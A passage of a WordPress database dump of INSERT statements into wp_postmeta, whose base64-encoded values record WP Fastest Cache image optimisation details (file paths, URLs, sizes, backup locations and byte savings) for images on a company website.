L3NsaWRlMV9jcm9wLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEwMzgsImlkIjo1Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV9jcm9wLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTA0MCwiaWQiOjU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX2Nyb3AtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfY3JvcC02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV9jcm9wLTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDQzLCJpZCI6NTZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30395, 55, 'wpfc_optimisation_reduction', '22634'); 
INSERT INTO `wp_postmeta` VALUES (30396, 55, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLmpwZyIsIndpZHRoIjoxOTIwLCJoZWlnaHQiOjgwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMS5qcGciLCJyZWR1Y3Rpb24iOjIyNjIwLCJ0aW1lIjoxNDgzNTkxMDUzLCJpZCI6IjU1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEwNTUsImlkIjo1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTEtODAweDMzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjMzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTEtODAweDMzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTEtODAweDMzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEwNTgsImlkIjo1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTEtNzY4eDMyMC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjMyMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTEtNzY4eDMyMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTEtNzY4eDMyMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEwNjEsImlkIjo1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTEtMTYwMHg2NjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6NjY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMS0xNjAweDY2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTEtMTYwMHg2NjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDY0LCJpZCI6NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDY3LCJpZCI6NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDY5LCJpZCI6NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDcxLCJpZCI6NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDc0LCJpZCI6NTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTEtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEwNzYsImlkIjo1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTA3OCwiaWQiOjU1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDgwLCJpZCI6NTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEwODMsImlkIjo1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTA4NSwiaWQiOjU1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxLTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMDg4LCJpZCI6NTV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30397, 54, 'wpfc_optimisation_reduction', '42567'); 
INSERT INTO `wp_postmeta` VALUES (30398, 54, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2luZ2xlaGFuZGVkLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2luZ2xlaGFuZGVkLmpwZyIsIndpZHRoIjozMDAsImhlaWdodCI6MzI4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2luZ2xlaGFuZGVkLmpwZyIsInJlZHVjdGlvbiI6NDI1NjAsInRpbWUiOjE0ODM1OTEwOTUsImlkIjoiNTQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NpbmdsZWhhbmRlZC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NpbmdsZWhhbmRlZC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NpbmdsZWhhbmRlZC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTA5NywiaWQiOjU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NpbmdsZWhhbmRlZC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NpbmdsZWhhbmRlZC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NpbmdsZWhhbmRlZC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTA5OSwiaWQiOjU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NpbmdsZWhhbmRlZC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NpbmdsZWhhbmRlZC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NpbmdsZWhhbmRlZC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTEwMSwiaWQiOjU0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2luZ2xlaGFuZGVkLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2luZ2xlaGFuZGVkLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2luZ2xlaGFuZGVkLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMTAzLCJpZCI6NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaW5nbGVoYW5kZWQtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaW5nbGVoYW5kZWQtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaW5nbGVoYW5kZWQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTExMDYsImlkIjo1NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NpbmdsZWhhbmRlZC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NpbmdsZWhhbmRlZC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NpbmdsZWhhbmRlZC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTEwOCwiaWQiOjU0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2luZ2xlaGFuZGVkLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2luZ2xlaGFuZGVkLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2luZ2xlaGFuZGVkLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMTEwLCJpZCI6NTR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30399, 53, 'wpfc_optimisation_reduction', '33665'); 
INSERT INTO `wp_postmeta` VALUES (30400, 53, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2Vuc29yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2Vuc29yLmpwZyIsIndpZHRoIjozMDAsImhlaWdodCI6MjI4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2Vuc29yLmpwZyIsInJlZHVjdGlvbiI6MzM2NTUsInRpbWUiOjE0ODM1OTExMTYsImlkIjoiNTMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NlbnNvci0yNTB4MjI4LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjI4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NlbnNvci0yNTB4MjI4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NlbnNvci0yNTB4MjI4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTExOSwiaWQiOjUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NlbnNvci0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NlbnNvci0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NlbnNvci0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwi